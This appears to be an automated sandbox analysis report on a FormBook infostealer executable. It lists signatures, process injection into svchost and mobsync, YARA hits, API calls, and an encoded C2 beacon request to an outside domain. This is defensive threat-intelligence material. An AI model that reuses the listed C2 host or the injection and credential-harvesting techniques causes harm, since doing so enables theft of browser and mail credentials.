Windows Analysis Report
Gz2FxKx2cM.exe

Overview

General Information

Sample name: Gz2FxKx2cM.exe (renamed because the original name is a hash value)
Original sample name: f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a.exe
Analysis ID: 1588319
MD5: f0483efd3c238f3181609c3aa40fdac6
SHA1: 9a5fa8d3e90ef6de9ef7117f87a9eabcb39d1189
SHA256: f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Gz2FxKx2cM.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\Gz2FxKx2cM.exe" MD5: F0483EFD3C238F3181609C3AA40FDAC6)
    • svchost.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\Gz2FxKx2cM.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HFOpYoEqWJkRNv.exe (PID: 796 cmdline: "C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • HFOpYoEqWJkRNv.exe (PID: 6844 cmdline: "C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches (memory dumps):
Source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
(2 further entries not expanded in this report)

Yara matches (unpacked PE files):
Source: 2.2.svchost.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.svchost.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ParentImage: C:\Users\user\Desktop\Gz2FxKx2cM.exe, ParentProcessId: 7636, ParentProcessName: Gz2FxKx2cM.exe, ProcessCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ProcessId: 7724, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ParentImage: C:\Users\user\Desktop\Gz2FxKx2cM.exe, ParentProcessId: 7636, ParentProcessName: Gz2FxKx2cM.exe, ProcessCommandLine: "C:\Users\user\Desktop\Gz2FxKx2cM.exe", ProcessId: 7724, ProcessName: svchost.exe
No Suricata rule has matched

                AV Detection

Source: Gz2FxKx2cM.exe, ReversingLabs: Detection: 71%
Source: Gz2FxKx2cM.exe, Virustotal: Detection: 54%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Gz2FxKx2cM.exe, Joe Sandbox ML: detected
Source: Gz2FxKx2cM.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HFOpYoEqWJkRNv.exe, 00000004.00000002.2673839896.000000000085E000.00000002.00000001.01000000.00000005.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675044855.000000000085E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Gz2FxKx2cM.exe, 00000000.00000003.1459399779.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Gz2FxKx2cM.exe, 00000000.00000003.1458037933.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1677898347.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582627864.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580605438.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1677898347.0000000003700000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1683183882.0000000004238000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000003.1681267661.000000000408F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921600498.000000000457E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1643779067.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643880204.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643896188.0000000003031000.00000004.00000020.00020000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675184319.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000007.00000002.1920673882.0000000002709000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000007.00000002.1921955822.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000000.1749658940.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000014C3C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_009637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_00963B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose

                Networking

Source: DNS query: www.izmirescortg.xyz
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_009722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic, HTTP traffic detected: GET /lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTX HTTP/1.1 Accept: */* Accept-Language: en-US Connection: close Host: www.izmirescortg.xyz User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.izmirescortg.xyz
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 22:58:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jX%2Ftr0tYJK%2FVuPWsk1Rktd8%2Bi8Yl8lwFv%2BsNV5OydejmiqjzgIuv4kXEYkHtbAym5mkB9SsvlsE1%2F4hU4puZTfmlRAFPQt1A7Bz7sKleyfDteJcLCGu4UUtaBh%2F4lY3Ztv6gjHlXYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900044fe2a950f80-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <di
Source: mobsync.exe, 00000007.00000002.1921955822.0000000004DF4000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675961964.0000000002B34000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000015024000.00000004.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.litespeedtech.com/error-page
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mobsync.exe, 00000007.00000003.1858808819.000000000754E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033t
Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mobsync.exe, 00000007.00000002.1920673882.0000000002723000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.ecosia.org/newtab/
Source: mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_00974164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_00973F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0096001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe, Code function: 0_2_0098CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: This is a third-party compiled AutoIt script.0_2_00903B3A
                Source: Gz2FxKx2cM.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Gz2FxKx2cM.exe, 00000000.00000000.1421011141.00000000009B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e413e8b3-d
                Source: Gz2FxKx2cM.exe, 00000000.00000000.1421011141.00000000009B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_938d8299-d
                Source: Gz2FxKx2cM.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b3a8d038-a
                Source: Gz2FxKx2cM.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_471bca0b-8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C483 NtClose,2_2_0042C483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03773D10 NtOpenProcessToken
Source: C:\Users\user\Desktop\Gz2FxKx2cM.exe | Code function: 0_2_0096A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
